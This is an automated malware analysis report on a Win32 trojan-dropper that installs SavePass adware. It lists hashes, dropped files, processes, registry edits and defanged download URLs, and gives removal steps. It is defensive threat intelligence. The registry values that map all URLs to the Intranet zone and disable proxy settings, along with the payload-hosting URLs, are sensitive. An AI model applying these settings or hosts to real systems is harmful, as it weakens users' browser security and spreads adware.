Trojan-Dropper.Win32.Agent.peok (Kaspersky), Gen:Variant.Adware.Zusy.127996 (B) (Emsisoft), Gen:Variant.Adware.Zusy.127996 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a0a59f72f2bbe495c7b4314a34f5b16c
SHA1: 8757838e8c142167819d54ce4f83796f136eb8c5
SHA256: a76002410292e9b7481b5a7d9465eadb66cda025a8d6c7fcb76e2636a61500b6
SSDeep: 6144:68yWGSreo5tSQDV2AOeJirGX0wLDcDqyvF0N6McKDm6WKR9Ula3:VtHSJFrGX0KDg0N6IDm6/R3
Size: 212384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-01 20:46:10
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Ywuovtbypk.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)
The process e33a47b.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (0 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
Registry activity
The process Ywuovtbypk.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"Publisher" = "OB"
"UninstallString" = "%Program Files%\SavePass 1.1\Uninstall.exe /fcp=1 /runexe='%Program Files%\SavePass 1.1\UninstallBrw.exe' /url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' /onerrorexe='%Program Files%\SavePass 1.1\utils.exe' /crregname='SavePass 1.1' /appid='69829' /srcid='001504' /bic='C54C51C1259F4E0794ABE2EFF455B67AIE' /verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' /installerversion='1_36_01_22' /statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' /errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' /monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrPublisherId" = "29777"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayName" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayIcon" = "%Program Files%\SavePass 1.1\utils.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\OB]
"69829" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 C9 AC DD 1B F6 C2 52 AD 8A FE 5D 1D 44 87 3F"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrAppId" = "69829"
"DisplayVersion" = "1.36.01.22"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process e33a47b.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"11995.bat" = "11995"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A E8 3D CB 24 78 19 E9 9B 7B 5C B4 29 E1 3F 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C3 29 8D 82 74 05 92 B8 30 E7 36 92 D9 B5 9B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"e33a47b.exe" = "e33a47b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process ping.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 77 FD 17 B7 8D 44 DE 70 E1 F9 90 1A EF CD AA"
The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 9C 56 85 AA C2 8B 90 C1 DE 0C CC 7B A9 DA"
The process ping.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 94 0E D9 68 6B E4 02 14 F9 CC 3F 87 6A A5 62"
The process ping.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C D7 54 5C 5E FF 86 86 D2 1D 20 33 81 0E 5D C7"
The process ping.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 BC 8C 76 44 E5 13 A7 81 C1 BF BA 58 4D 70 0C"
The process ping.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 4B 8E 9B A1 60 70 61 5F 21 60 18 24 8B 40 2A"
The process ping.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 61 04 DA 01 85 AE F8 B1 44 FF 55 ED E5 DA 77"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 27 B9 3B 09 2D 54 E8 B9 35 22 67 C4 A8 5C 6A"
The process ping.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 91 1F 9A B0 F3 C7 60 4B 1F F5 66 06 0B E7 35"
Dropped PE files
MD5 | File path |
---|---|
72d181e3089d6eee4c1f81c1b13ea88c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a |
efc6d4bd8ac2e791549143ed7dc39d39 | c:\Program Files\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe |
0374c8fec0166143ddad92c34878adf8 | c:\Program Files\SavePass 1.1\Uninstall.exe |
6860cb0759479d5b028812cf6a24f9d2 | c:\Program Files\SavePass 1.1\UninstallBrw.exe |
4b47189b70d27324629908716d40ac7d | c:\Program Files\SavePass 1.1\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 347 | 512 | 2.72762 | bd24fddc16367e94a0e4291cdc13185a |
.rdata | 8192 | 366 | 512 | 2.4907 | ae9775f4ec0f9ea8215ac0d0005da1bf |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 | 208.85.150.249 |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_b | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_e | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_c | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_a | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_d | |
